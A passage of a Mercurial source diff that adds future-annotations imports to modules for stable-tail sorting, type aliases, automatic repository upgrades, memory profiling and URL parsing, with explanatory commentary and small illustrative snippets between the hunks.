36 | 38 | minimising the size of the exclusive part and maximise the size of the |
|
37 | 39 | tail part, hopefully reducing the overall complexity of the stable-tail |
|
38 | 40 | sort. |
|
39 | 41 | |
|
40 | 42 | In case of equal ranks, the stable node ID is used as a tie-breaker. |
|
41 | 43 | """ |
|
42 | 44 | r1, r2 = cl.fast_rank(p1), cl.fast_rank(p2) |
|
43 | 45 | if r1 < r2: |
|
44 | 46 | return (p1, p2) |
|
45 | 47 | elif r1 > r2: |
|
46 | 48 | return (p2, p1) |
|
47 | 49 | elif cl.node(p1) < cl.node(p2): |
|
48 | 50 | return (p1, p2) |
|
49 | 51 | else: |
|
50 | 52 | return (p2, p1) |
|
51 | 53 | |
|
52 | 54 | |
|
53 | 55 | def _nonoedipal_parent_revs(cl, rev): |
|
54 | 56 | """ |
|
55 | 57 | Returns the non-Εdipal parent pair of the given revision. |
|
56 | 58 | |
|
57 | 59 | An Εdipal merge is a merge with parents p1, p2 with either |
|
58 | 60 | p1 in ancestors(p2) or p2 in ancestors(p1). |
|
59 | 61 | In the first case, p1 is the Εdipal parent. |
|
60 | 62 | In the second case, p2 is the Εdipal parent. |
|
61 | 63 | |
|
62 | 64 | Εdipal edges start empty exclusive parts. They do not bring new ancestors. |
|
63 | 65 | As such, they can be skipped when computing any topological sort or any |
|
64 | 66 | iteration over the ancestors of a node. |
|
65 | 67 | |
|
66 | 68 | The Εdipal edges are eliminated here using the rank information. |
|
67 | 69 | """ |
|
68 | 70 | p1, p2 = cl.parentrevs(rev) |
|
69 | 71 | if p1 == nullrev or cl.fast_rank(p2) == cl.fast_rank(rev) - 1: |
|
70 | 72 | return p2, nullrev |
|
71 | 73 | elif p2 == nullrev or cl.fast_rank(p1) == cl.fast_rank(rev) - 1: |
|
72 | 74 | return p1, nullrev |
|
73 | 75 | else: |
|
74 | 76 | return p1, p2 |
|
75 | 77 | |
|
76 | 78 | |
|
77 | 79 | def _parents(cl, rev): |
|
78 | 80 | p1, p2 = _nonoedipal_parent_revs(cl, rev) |
|
79 | 81 | if p2 == nullrev: |
|
80 | 82 | return p1, p2 |
|
81 | 83 | |
|
82 | 84 | return _sorted_parents(cl, p1, p2) |
|
83 | 85 | |
|
84 | 86 | |
|
85 | 87 | def _stable_tail_sort_naive(cl, head_rev): |
|
86 | 88 | """ |
|
87 | 89 | Naive topological iterator of the ancestors given by the stable-tail sort. |
|
88 | 90 | |
|
89 | 91 | The stable-tail sort of a node "h" is defined as the sequence: |
|
90 | 92 | sts(h) := [h] + excl(h) + sts(pt(h)) |
|
91 | 93 | where excl(h) := u for u in sts(px(h)) if u not in ancestors(pt(h)) |
|
92 | 94 | |
|
93 | 95 | This implementation uses a call-stack whose size is |
|
94 | 96 | O(number of open merges). |
|
95 | 97 | |
|
96 | 98 | As such, this implementation exists mainly as a defining reference. |
|
97 | 99 | """ |
|
98 | 100 | cursor_rev = head_rev |
|
99 | 101 | while cursor_rev != nullrev: |
|
100 | 102 | yield cursor_rev |
|
101 | 103 | |
|
102 | 104 | px, pt = _parents(cl, cursor_rev) |
|
103 | 105 | if pt == nullrev: |
|
104 | 106 | cursor_rev = px |
|
105 | 107 | else: |
|
106 | 108 | tail_ancestors = ancestor.lazyancestors( |
|
107 | 109 | cl.parentrevs, (pt,), inclusive=True |
|
108 | 110 | ) |
|
109 | 111 | exclusive_ancestors = ( |
|
110 | 112 | a |
|
111 | 113 | for a in _stable_tail_sort_naive(cl, px) |
|
112 | 114 | if a not in tail_ancestors |
|
113 | 115 | ) |
|
114 | 116 | |
|
115 | 117 | # Notice that excl(cur) is disjoint from ancestors(pt), |
|
116 | 118 | # so there is no double-counting: |
|
117 | 119 | # rank(cur) = len([cur]) + len(excl(cur)) + rank(pt) |
|
118 | 120 | excl_part_size = cl.fast_rank(cursor_rev) - cl.fast_rank(pt) - 1 |
|
119 | 121 | yield from itertools.islice(exclusive_ancestors, excl_part_size) |
|
120 | 122 | cursor_rev = pt |
|
121 | 123 | |
|
122 | 124 | |
|
123 | 125 | def _find_all_leaps_naive(cl, head_rev): |
|
124 | 126 | """ |
|
125 | 127 | Yields the leaps in the stable-tail sort of the given revision. |
|
126 | 128 | |
|
127 | 129 | A leap is a pair of revisions (source, target) consecutive in the |
|
128 | 130 | stable-tail sort of a head, for which target != px(source). |
|
129 | 131 | |
|
130 | 132 | Leaps are yielded in the same order as encountered in the stable-tail sort, |
|
131 | 133 | from head to root. |
|
132 | 134 | """ |
|
133 | 135 | sts = _stable_tail_sort_naive(cl, head_rev) |
|
134 | 136 | prev = next(sts) |
|
135 | 137 | for current in sts: |
|
136 | 138 | if current != _parents(cl, prev)[0]: |
|
137 | 139 | yield (prev, current) |
|
138 | 140 | |
|
139 | 141 | prev = current |
|
140 | 142 | |
|
141 | 143 | |
|
142 | 144 | def _find_specific_leaps_naive(cl, head_rev): |
|
143 | 145 | """ |
|
144 | 146 | Returns the specific leaps in the stable-tail sort of the given revision. |
|
145 | 147 | |
|
146 | 148 | Specific leaps are leaps appear in the stable-tail sort of a given |
|
147 | 149 | revision, but not in the stable-tail sort of any of its ancestors. |
|
148 | 150 | |
|
149 | 151 | The final leaps (leading to the pt of the considered merge) are omitted. |
|
150 | 152 | |
|
151 | 153 | Only merge nodes can have associated specific leaps. |
|
152 | 154 | |
|
153 | 155 | This implementations uses the whole leap sets of the given revision and |
|
154 | 156 | of its parents. |
|
155 | 157 | """ |
|
156 | 158 | px, pt = _parents(cl, head_rev) |
|
157 | 159 | if px == nullrev or pt == nullrev: |
|
158 | 160 | return # linear nodes cannot have specific leaps |
|
159 | 161 | |
|
160 | 162 | parents_leaps = set(_find_all_leaps_naive(cl, px)) |
|
161 | 163 | |
|
162 | 164 | sts = _stable_tail_sort_naive(cl, head_rev) |
|
163 | 165 | prev = next(sts) |
|
164 | 166 | for current in sts: |
|
165 | 167 | if current == pt: |
|
166 | 168 | break |
|
167 | 169 | if current != _parents(cl, prev)[0]: |
|
168 | 170 | leap = (prev, current) |
|
169 | 171 | if leap not in parents_leaps: |
|
170 | 172 | yield leap |
|
171 | 173 | |
|
172 | 174 | prev = current |
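
The naive generator above follows the recurrence sts(h) = [h] + excl(h) + sts(pt(h)) directly. The toy transcription below runs it over a hand-built parent map, with plain dicts standing in for the changelog's `parentrevs`/`fast_rank`; the four-node graph and helper names are made up for illustration and ties are broken arbitrarily rather than by node id. It demonstrates the shared-suffix property the module docstring describes.

```python
# Toy stable-tail sort over a tiny hand-built DAG; -1 is the null revision.
# This is a sketch of the recurrence, not the Mercurial implementation.
NULL = -1
PARENTS = {0: (NULL, NULL), 1: (0, NULL), 2: (0, NULL), 3: (1, 2)}


def ancestors(rev):
    seen, stack = set(), [rev]
    while stack:
        r = stack.pop()
        if r != NULL and r not in seen:
            seen.add(r)
            stack.extend(PARENTS[r])
    return seen


def rank(rev):
    return len(ancestors(rev))  # number of ancestors, including rev itself


def sts(rev):
    if rev == NULL:
        return []
    p1, p2 = PARENTS[rev]
    if p2 == NULL:
        return [rev] + sts(p1)
    # px: lowest-ranked parent, starting the exclusive part
    px, pt = (p1, p2) if rank(p1) <= rank(p2) else (p2, p1)
    excl = [r for r in sts(px) if r not in ancestors(pt)]
    return [rev] + excl + sts(pt)


print(sts(3))  # [3, 1, 2, 0]
print(sts(2))  # [2, 0] -- already a suffix of sts(3), hence "stable tail"
assert sts(3)[-len(sts(2)):] == sts(2)
```
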
@@ -1,48 +1,50 | |||
|
1 | 1 | # typelib.py - type hint aliases and support |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2022 Matt Harbison <matt_harbison@yahoo.com> |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | import typing |
|
9 | 11 | |
|
10 | 12 | from typing import ( |
|
11 | 13 | Callable, |
|
12 | 14 | ) |
|
13 | 15 | |
|
14 | 16 | # Note: this is slightly different from pycompat.TYPE_CHECKING, as using |
|
15 | 17 | # pycompat causes the BinaryIO_Proxy type to be resolved to ``object`` when |
|
16 | 18 | # used as the base class during a pytype run. |
|
17 | 19 | TYPE_CHECKING = typing.TYPE_CHECKING |
|
18 | 20 | |
|
19 | 21 | |
|
20 | 22 | # The BinaryIO class provides empty methods, which at runtime means that |
|
21 | 23 | # ``__getattr__`` on the proxy classes won't get called for the methods that |
|
22 | 24 | # should delegate to the internal object. So to avoid runtime changes because |
|
23 | 25 | # of the required typing inheritance, just use BinaryIO when typechecking, and |
|
24 | 26 | # ``object`` otherwise. |
|
25 | 27 | if TYPE_CHECKING: |
|
26 | 28 | from typing import ( |
|
27 | 29 | BinaryIO, |
|
28 | 30 | Union, |
|
29 | 31 | ) |
|
30 | 32 | |
|
31 | 33 | from . import ( |
|
32 | 34 | node, |
|
33 | 35 | posix, |
|
34 | 36 | windows, |
|
35 | 37 | ) |
|
36 | 38 | |
|
37 | 39 | BinaryIO_Proxy = BinaryIO |
|
38 | 40 | CacheStat = Union[posix.cachestat, windows.cachestat] |
|
39 | 41 | NodeConstants = node.sha1nodeconstants |
|
40 | 42 | else: |
|
41 | 43 | from typing import Any |
|
42 | 44 | |
|
43 | 45 | BinaryIO_Proxy = object |
|
44 | 46 | CacheStat = Any |
|
45 | 47 | NodeConstants = Any |
|
46 | 48 | |
|
47 | 49 | # scmutil.getuipathfn() related callback. |
|
48 | 50 | UiPathFn = Callable[[bytes], bytes] |
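
The conditional alias above keeps runtime delegation through `__getattr__` working (because `object` defines no file methods of its own) while still presenting a `BinaryIO` base to type checkers. Below is a minimal sketch of how such an alias is typically consumed; the `FileProxy` class is invented for illustration and is not a Mercurial class.

```python
import io
import typing
from typing import BinaryIO

# same trick as typelib.BinaryIO_Proxy: a real typing base only when
# type checking, a featureless `object` base at runtime
if typing.TYPE_CHECKING:
    BinaryIO_Proxy = BinaryIO
else:
    BinaryIO_Proxy = object


class FileProxy(BinaryIO_Proxy):
    """Wraps a binary file object and delegates every attribute to it."""

    def __init__(self, fp):
        self._fp = fp

    def __getattr__(self, name):
        # only reached for names not found on the proxy itself, which is
        # exactly why the runtime base class must not provide stub methods
        return getattr(self._fp, name)


p = FileProxy(io.BytesIO(b'abc'))
assert p.read() == b'abc'  # resolved through __getattr__
```
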
@@ -1,254 +1,257 | |||
|
1 | 1 | # upgrade.py - functions for automatic upgrade of Mercurial repository |
|
2 | 2 | # |
|
3 | 3 | # Copyright (c) 2022-present, Pierre-Yves David |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | ||
|
8 | from __future__ import annotations | |
|
9 | ||
|
7 | 10 | from ..i18n import _ |
|
8 | 11 | |
|
9 | 12 | from .. import ( |
|
10 | 13 | error, |
|
11 | 14 | requirements as requirementsmod, |
|
12 | 15 | scmutil, |
|
13 | 16 | ) |
|
14 | 17 | |
|
15 | 18 | from . import ( |
|
16 | 19 | actions, |
|
17 | 20 | engine, |
|
18 | 21 | ) |
|
19 | 22 | |
|
20 | 23 | |
|
21 | 24 | class AutoUpgradeOperation(actions.BaseOperation): |
|
22 | 25 | """A limited Upgrade Operation used to run simple auto upgrade task |
|
23 | 26 | |
|
24 | 27 | (Expand it as needed in the future) |
|
25 | 28 | """ |
|
26 | 29 | |
|
27 | 30 | def __init__(self, req): |
|
28 | 31 | super().__init__( |
|
29 | 32 | new_requirements=req, |
|
30 | 33 | backup_store=False, |
|
31 | 34 | ) |
|
32 | 35 | |
|
33 | 36 | |
|
34 | 37 | def get_share_safe_action(repo): |
|
35 | 38 | """return an automatic-upgrade action for `share-safe` if applicable |
|
36 | 39 | |
|
37 | 40 | If no action is needed, return None, otherwise return a callback to upgrade |
|
38 | 41 | or downgrade the repository according the configuration and repository |
|
39 | 42 | format. |
|
40 | 43 | """ |
|
41 | 44 | ui = repo.ui |
|
42 | 45 | requirements = repo.requirements |
|
43 | 46 | auto_upgrade_share_source = ui.configbool( |
|
44 | 47 | b'format', |
|
45 | 48 | b'use-share-safe.automatic-upgrade-of-mismatching-repositories', |
|
46 | 49 | ) |
|
47 | 50 | auto_upgrade_quiet = ui.configbool( |
|
48 | 51 | b'format', |
|
49 | 52 | b'use-share-safe.automatic-upgrade-of-mismatching-repositories:quiet', |
|
50 | 53 | ) |
|
51 | 54 | |
|
52 | 55 | action = None |
|
53 | 56 | |
|
54 | 57 | if ( |
|
55 | 58 | auto_upgrade_share_source |
|
56 | 59 | and requirementsmod.SHARED_REQUIREMENT not in requirements |
|
57 | 60 | ): |
|
58 | 61 | sf_config = ui.configbool(b'format', b'use-share-safe') |
|
59 | 62 | sf_local = requirementsmod.SHARESAFE_REQUIREMENT in requirements |
|
60 | 63 | if sf_config and not sf_local: |
|
61 | 64 | msg = _( |
|
62 | 65 | b"automatically upgrading repository to the `share-safe`" |
|
63 | 66 | b" feature\n" |
|
64 | 67 | ) |
|
65 | 68 | hint = b"(see `hg help config.format.use-share-safe` for details)\n" |
|
66 | 69 | |
|
67 | 70 | def action(): |
|
68 | 71 | if not (ui.quiet or auto_upgrade_quiet): |
|
69 | 72 | ui.write_err(msg) |
|
70 | 73 | ui.write_err(hint) |
|
71 | 74 | requirements.add(requirementsmod.SHARESAFE_REQUIREMENT) |
|
72 | 75 | scmutil.writereporequirements(repo, requirements) |
|
73 | 76 | |
|
74 | 77 | elif sf_local and not sf_config: |
|
75 | 78 | msg = _( |
|
76 | 79 | b"automatically downgrading repository from the `share-safe`" |
|
77 | 80 | b" feature\n" |
|
78 | 81 | ) |
|
79 | 82 | hint = b"(see `hg help config.format.use-share-safe` for details)\n" |
|
80 | 83 | |
|
81 | 84 | def action(): |
|
82 | 85 | if not (ui.quiet or auto_upgrade_quiet): |
|
83 | 86 | ui.write_err(msg) |
|
84 | 87 | ui.write_err(hint) |
|
85 | 88 | requirements.discard(requirementsmod.SHARESAFE_REQUIREMENT) |
|
86 | 89 | scmutil.writereporequirements(repo, requirements) |
|
87 | 90 | |
|
88 | 91 | return action |
|
89 | 92 | |
|
90 | 93 | |
|
91 | 94 | def get_tracked_hint_action(repo): |
|
92 | 95 | """return an automatic-upgrade action for `tracked-hint` if applicable |
|
93 | 96 | |
|
94 | 97 | If no action is needed, return None, otherwise return a callback to upgrade |
|
95 | 98 | or downgrade the repository according the configuration and repository |
|
96 | 99 | format. |
|
97 | 100 | """ |
|
98 | 101 | ui = repo.ui |
|
99 | 102 | requirements = set(repo.requirements) |
|
100 | 103 | auto_upgrade_tracked_hint = ui.configbool( |
|
101 | 104 | b'format', |
|
102 | 105 | b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories', |
|
103 | 106 | ) |
|
104 | 107 | auto_upgrade_quiet = ui.configbool( |
|
105 | 108 | b'format', |
|
106 | 109 | b'use-dirstate-tracked-hint.automatic-upgrade-of-mismatching-repositories:quiet', |
|
107 | 110 | ) |
|
108 | 111 | |
|
109 | 112 | action = None |
|
110 | 113 | |
|
111 | 114 | if auto_upgrade_tracked_hint: |
|
112 | 115 | th_config = ui.configbool(b'format', b'use-dirstate-tracked-hint') |
|
113 | 116 | th_local = requirementsmod.DIRSTATE_TRACKED_HINT_V1 in requirements |
|
114 | 117 | if th_config and not th_local: |
|
115 | 118 | msg = _( |
|
116 | 119 | b"automatically upgrading repository to the `tracked-hint`" |
|
117 | 120 | b" feature\n" |
|
118 | 121 | ) |
|
119 | 122 | hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n" |
|
120 | 123 | |
|
121 | 124 | def action(): |
|
122 | 125 | if not (ui.quiet or auto_upgrade_quiet): |
|
123 | 126 | ui.write_err(msg) |
|
124 | 127 | ui.write_err(hint) |
|
125 | 128 | requirements.add(requirementsmod.DIRSTATE_TRACKED_HINT_V1) |
|
126 | 129 | op = AutoUpgradeOperation(requirements) |
|
127 | 130 | engine.upgrade_tracked_hint(ui, repo, op, add=True) |
|
128 | 131 | |
|
129 | 132 | elif th_local and not th_config: |
|
130 | 133 | msg = _( |
|
131 | 134 | b"automatically downgrading repository from the `tracked-hint`" |
|
132 | 135 | b" feature\n" |
|
133 | 136 | ) |
|
134 | 137 | hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n" |
|
135 | 138 | |
|
136 | 139 | def action(): |
|
137 | 140 | if not (ui.quiet or auto_upgrade_quiet): |
|
138 | 141 | ui.write_err(msg) |
|
139 | 142 | ui.write_err(hint) |
|
140 | 143 | requirements.discard(requirementsmod.DIRSTATE_TRACKED_HINT_V1) |
|
141 | 144 | op = AutoUpgradeOperation(requirements) |
|
142 | 145 | engine.upgrade_tracked_hint(ui, repo, op, add=False) |
|
143 | 146 | |
|
144 | 147 | return action |
|
145 | 148 | |
|
146 | 149 | |
|
147 | 150 | def get_dirstate_v2_action(repo): |
|
148 | 151 | """return an automatic-upgrade action for `dirstate-v2` if applicable |
|
149 | 152 | |
|
150 | 153 | If no action is needed, return None, otherwise return a callback to upgrade |
|
151 | 154 | or downgrade the repository according the configuration and repository |
|
152 | 155 | format. |
|
153 | 156 | """ |
|
154 | 157 | ui = repo.ui |
|
155 | 158 | requirements = set(repo.requirements) |
|
156 | 159 | auto_upgrade_dv2 = ui.configbool( |
|
157 | 160 | b'format', |
|
158 | 161 | b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories', |
|
159 | 162 | ) |
|
160 | 163 | auto_upgrade_dv2_quiet = ui.configbool( |
|
161 | 164 | b'format', |
|
162 | 165 | b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories:quiet', |
|
163 | 166 | ) |
|
164 | 167 | |
|
165 | 168 | action = None |
|
166 | 169 | |
|
167 | 170 | if auto_upgrade_dv2: |
|
168 | 171 | d2_config = ui.configbool(b'format', b'use-dirstate-v2') |
|
169 | 172 | d2_local = requirementsmod.DIRSTATE_V2_REQUIREMENT in requirements |
|
170 | 173 | if d2_config and not d2_local: |
|
171 | 174 | msg = _( |
|
172 | 175 | b"automatically upgrading repository to the `dirstate-v2`" |
|
173 | 176 | b" feature\n" |
|
174 | 177 | ) |
|
175 | 178 | hint = ( |
|
176 | 179 | b"(see `hg help config.format.use-dirstate-v2` for details)\n" |
|
177 | 180 | ) |
|
178 | 181 | |
|
179 | 182 | def action(): |
|
180 | 183 | if not (ui.quiet or auto_upgrade_dv2_quiet): |
|
181 | 184 | ui.write_err(msg) |
|
182 | 185 | ui.write_err(hint) |
|
183 | 186 | requirements.add(requirementsmod.DIRSTATE_V2_REQUIREMENT) |
|
184 | 187 | fake_op = AutoUpgradeOperation(requirements) |
|
185 | 188 | engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v1', b'v2') |
|
186 | 189 | |
|
187 | 190 | elif d2_local and not d2_config: |
|
188 | 191 | msg = _( |
|
189 | 192 | b"automatically downgrading repository from the `dirstate-v2`" |
|
190 | 193 | b" feature\n" |
|
191 | 194 | ) |
|
192 | 195 | hint = ( |
|
193 | 196 | b"(see `hg help config.format.use-dirstate-v2` for details)\n" |
|
194 | 197 | ) |
|
195 | 198 | |
|
196 | 199 | def action(): |
|
197 | 200 | if not (ui.quiet or auto_upgrade_dv2_quiet): |
|
198 | 201 | ui.write_err(msg) |
|
199 | 202 | ui.write_err(hint) |
|
200 | 203 | requirements.discard(requirementsmod.DIRSTATE_V2_REQUIREMENT) |
|
201 | 204 | fake_op = AutoUpgradeOperation(requirements) |
|
202 | 205 | engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v2', b'v1') |
|
203 | 206 | |
|
204 | 207 | return action |
|
205 | 208 | |
|
206 | 209 | |
|
207 | 210 | AUTO_UPGRADE_ACTIONS = [ |
|
208 | 211 | get_dirstate_v2_action, |
|
209 | 212 | get_share_safe_action, |
|
210 | 213 | get_tracked_hint_action, |
|
211 | 214 | ] |
|
212 | 215 | |
|
213 | 216 | |
|
214 | 217 | def may_auto_upgrade(repo, maker_func): |
|
215 | 218 | """potentially perform auto-upgrade and return the final repository to use |
|
216 | 219 | |
|
217 | 220 | Auto-upgrade are "quick" repository upgrade that might automatically be run |
|
218 | 221 | by "any" repository access. See `hg help config.format` for automatic |
|
219 | 222 | upgrade documentation. |
|
220 | 223 | |
|
221 | 224 | note: each relevant upgrades are done one after the other for simplicity. |
|
222 | 225 | This avoid having repository is partially inconsistent state while |
|
223 | 226 | upgrading. |
|
224 | 227 | |
|
225 | 228 | repo: the current repository instance |
|
226 | 229 | maker_func: a factory function that can recreate a repository after an upgrade |
|
227 | 230 | """ |
|
228 | 231 | clear = False |
|
229 | 232 | |
|
230 | 233 | loop = 0 |
|
231 | 234 | |
|
232 | 235 | try: |
|
233 | 236 | while not clear: |
|
234 | 237 | loop += 1 |
|
235 | 238 | if loop > 100: |
|
236 | 239 | # XXX basic protection against infinite loop, make it better. |
|
237 | 240 | raise error.ProgrammingError("Too many auto upgrade loops") |
|
238 | 241 | clear = True |
|
239 | 242 | for get_action in AUTO_UPGRADE_ACTIONS: |
|
240 | 243 | action = get_action(repo) |
|
241 | 244 | if action is not None: |
|
242 | 245 | clear = False |
|
243 | 246 | with repo.wlock(wait=False), repo.lock(wait=False): |
|
244 | 247 | action = get_action(repo) |
|
245 | 248 | if action is not None: |
|
246 | 249 | action() |
|
247 | 250 | repo = maker_func() |
|
248 | 251 | except error.LockError: |
|
249 | 252 | # if we cannot get the lock, ignore the auto-upgrade attemps and |
|
250 | 253 | # proceed. We might want to make this behavior configurable in the |
|
251 | 254 | # future. |
|
252 | 255 | pass |
|
253 | 256 | |
|
254 | 257 | return repo |
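
The loop in `may_auto_upgrade` queries each action twice: once without the locks to decide whether anything needs doing, and again once the locks are held, since another process may have upgraded the repository in between. Here is a reduced sketch of that check-lock-recheck pattern, with a dict standing in for the repository and all names invented for illustration.

```python
# Reduced sketch of the check / lock / re-check loop; `repo` is a plain
# dict and `locked` a stand-in for wlock()/lock(), both invented here.
import contextlib


@contextlib.contextmanager
def locked(repo):
    # the real code uses repo.wlock(wait=False) and repo.lock(wait=False),
    # and gives up silently on LockError
    yield


def get_feature_action(repo):
    # pretend configuration says the 'feature' requirement should be present
    if 'feature' in repo['requirements']:
        return None
    return lambda: repo['requirements'].add('feature')


def may_auto_upgrade(repo, actions=(get_feature_action,)):
    clear = False
    while not clear:
        clear = True
        for get_action in actions:
            if get_action(repo) is None:
                continue
            clear = False
            with locked(repo):
                action = get_action(repo)  # re-check now that the lock is held
                if action is not None:
                    action()
    return repo


repo = {'requirements': set()}
may_auto_upgrade(repo)
assert repo['requirements'] == {'feature'}
```
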
@@ -1,44 +1,46 | |||
|
1 | 1 | # memorytop requires Python 3.4 |
|
2 | 2 | # |
|
3 | 3 | # Usage: set PYTHONTRACEMALLOC=n in the environment of the hg invocation, |
|
4 | 4 | # where n >= 1 is the number of frames to show in the backtrace. Put calls to
|
5 | 5 | # memorytop in strategic places to show the current memory use by allocation |
|
6 | 6 | # site. |
|
7 | 7 | |
|
8 | from __future__ import annotations | |
|
9 | ||
|
8 | 10 | import gc |
|
9 | 11 | import tracemalloc |
|
10 | 12 | |
|
11 | 13 | |
|
12 | 14 | def memorytop(limit=10): |
|
13 | 15 | gc.collect() |
|
14 | 16 | snapshot = tracemalloc.take_snapshot() |
|
15 | 17 | |
|
16 | 18 | snapshot = snapshot.filter_traces( |
|
17 | 19 | ( |
|
18 | 20 | tracemalloc.Filter(False, "<frozen importlib._bootstrap>"), |
|
19 | 21 | tracemalloc.Filter(False, "<frozen importlib._bootstrap_external>"), |
|
20 | 22 | tracemalloc.Filter(False, "<unknown>"), |
|
21 | 23 | ) |
|
22 | 24 | ) |
|
23 | 25 | stats = snapshot.statistics('traceback') |
|
24 | 26 | |
|
25 | 27 | total = sum(stat.size for stat in stats) |
|
26 | 28 | print("\nTotal allocated size: %.1f KiB\n" % (total / 1024)) |
|
27 | 29 | print("Lines with the biggest net allocations") |
|
28 | 30 | for index, stat in enumerate(stats[:limit], 1): |
|
29 | 31 | print( |
|
30 | 32 | "#%d: %d objects using %.1f KiB" |
|
31 | 33 | % (index, stat.count, stat.size / 1024) |
|
32 | 34 | ) |
|
33 | 35 | for line in stat.traceback.format(most_recent_first=True): |
|
34 | 36 | print(' ', line) |
|
35 | 37 | |
|
36 | 38 | other = stats[limit:] |
|
37 | 39 | if other: |
|
38 | 40 | size = sum(stat.size for stat in other) |
|
39 | 41 | count = sum(stat.count for stat in other) |
|
40 | 42 | print( |
|
41 | 43 | "%s other: %d objects using %.1f KiB" |
|
42 | 44 | % (len(other), count, size / 1024) |
|
43 | 45 | ) |
|
44 | 46 | print() |
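
As the header comment says, the helper only reports anything when tracemalloc has been enabled through `PYTHONTRACEMALLOC`, for example `PYTHONTRACEMALLOC=10 hg status`. A typical use is to drop a call at a suspect point; the call site below is invented for illustration, and the import path assumes the module lives under `mercurial/utils/`.

```python
# hypothetical call site inside some Mercurial code path
from mercurial.utils.memorytop import memorytop


def expensive_step(data):
    result = [x * 2 for x in data]  # placeholder for the work being profiled
    memorytop(limit=5)  # print the five allocation sites using the most memory
    return result
```
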
@@ -1,971 +1,974 | |||
|
1 | 1 | # utils.urlutil - code related to [paths] management |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2005-2023 Olivia Mackall <olivia@selenic.com> and others |
|
4 | 4 | # |
|
5 | 5 | # This software may be used and distributed according to the terms of the |
|
6 | 6 | # GNU General Public License version 2 or any later version. |
|
7 | ||
|
8 | from __future__ import annotations | |
|
9 | ||
|
7 | 10 | import os |
|
8 | 11 | import re as remod |
|
9 | 12 | import socket |
|
10 | 13 | |
|
11 | 14 | from typing import ( |
|
12 | 15 | Callable, |
|
13 | 16 | Dict, |
|
14 | 17 | Tuple, |
|
15 | 18 | Union, |
|
16 | 19 | ) |
|
17 | 20 | |
|
18 | 21 | from ..i18n import _ |
|
19 | 22 | from .. import ( |
|
20 | 23 | encoding, |
|
21 | 24 | error, |
|
22 | 25 | pycompat, |
|
23 | 26 | urllibcompat, |
|
24 | 27 | ) |
|
25 | 28 | |
|
26 | 29 | from . import ( |
|
27 | 30 | stringutil, |
|
28 | 31 | ) |
|
29 | 32 | |
|
30 | 33 | from ..revlogutils import ( |
|
31 | 34 | constants as revlog_constants, |
|
32 | 35 | ) |
|
33 | 36 | |
|
34 | 37 | # keeps pyflakes happy |
|
35 | 38 | assert [Callable, Dict, Tuple, Union] |
|
36 | 39 | |
|
37 | 40 | urlreq = urllibcompat.urlreq |
|
38 | 41 | |
|
39 | 42 | |
|
40 | 43 | def getport(port: Union[bytes, int]) -> int: |
|
41 | 44 | """Return the port for a given network service. |
|
42 | 45 | |
|
43 | 46 | If port is an integer, it's returned as is. If it's a string, it's |
|
44 | 47 | looked up using socket.getservbyname(). If there's no matching |
|
45 | 48 | service, error.Abort is raised. |
|
46 | 49 | """ |
|
47 | 50 | try: |
|
48 | 51 | return int(port) |
|
49 | 52 | except ValueError: |
|
50 | 53 | pass |
|
51 | 54 | |
|
52 | 55 | try: |
|
53 | 56 | return socket.getservbyname(pycompat.sysstr(port)) |
|
54 | 57 | except socket.error: |
|
55 | 58 | raise error.Abort( |
|
56 | 59 | _(b"no port number associated with service '%s'") % port |
|
57 | 60 | ) |
|
58 | 61 | |
|
59 | 62 | |
|
60 | 63 | class url: |
|
61 | 64 | r"""Reliable URL parser. |
|
62 | 65 | |
|
63 | 66 | This parses URLs and provides attributes for the following |
|
64 | 67 | components: |
|
65 | 68 | |
|
66 | 69 | <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> |
|
67 | 70 | |
|
68 | 71 | Missing components are set to None. The only exception is |
|
69 | 72 | fragment, which is set to '' if present but empty. |
|
70 | 73 | |
|
71 | 74 | If parsefragment is False, fragment is included in query. If |
|
72 | 75 | parsequery is False, query is included in path. If both are |
|
73 | 76 | False, both fragment and query are included in path. |
|
74 | 77 | |
|
75 | 78 | See http://www.ietf.org/rfc/rfc2396.txt for more information. |
|
76 | 79 | |
|
77 | 80 | Note that for backward compatibility reasons, bundle URLs do not |
|
78 | 81 | take host names. That means 'bundle://../' has a path of '../'. |
|
79 | 82 | |
|
80 | 83 | Examples: |
|
81 | 84 | |
|
82 | 85 | >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') |
|
83 | 86 | <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> |
|
84 | 87 | >>> url(b'ssh://[::1]:2200//home/joe/repo') |
|
85 | 88 | <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> |
|
86 | 89 | >>> url(b'file:///home/joe/repo') |
|
87 | 90 | <url scheme: 'file', path: '/home/joe/repo'> |
|
88 | 91 | >>> url(b'file:///c:/temp/foo/') |
|
89 | 92 | <url scheme: 'file', path: 'c:/temp/foo/'> |
|
90 | 93 | >>> url(b'bundle:foo') |
|
91 | 94 | <url scheme: 'bundle', path: 'foo'> |
|
92 | 95 | >>> url(b'bundle://../foo') |
|
93 | 96 | <url scheme: 'bundle', path: '../foo'> |
|
94 | 97 | >>> url(br'c:\foo\bar') |
|
95 | 98 | <url path: 'c:\\foo\\bar'> |
|
96 | 99 | >>> url(br'\\blah\blah\blah') |
|
97 | 100 | <url path: '\\\\blah\\blah\\blah'> |
|
98 | 101 | >>> url(br'\\blah\blah\blah#baz') |
|
99 | 102 | <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> |
|
100 | 103 | >>> url(br'file:///C:\users\me') |
|
101 | 104 | <url scheme: 'file', path: 'C:\\users\\me'> |
|
102 | 105 | |
|
103 | 106 | Authentication credentials: |
|
104 | 107 | |
|
105 | 108 | >>> url(b'ssh://joe:xyz@x/repo') |
|
106 | 109 | <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> |
|
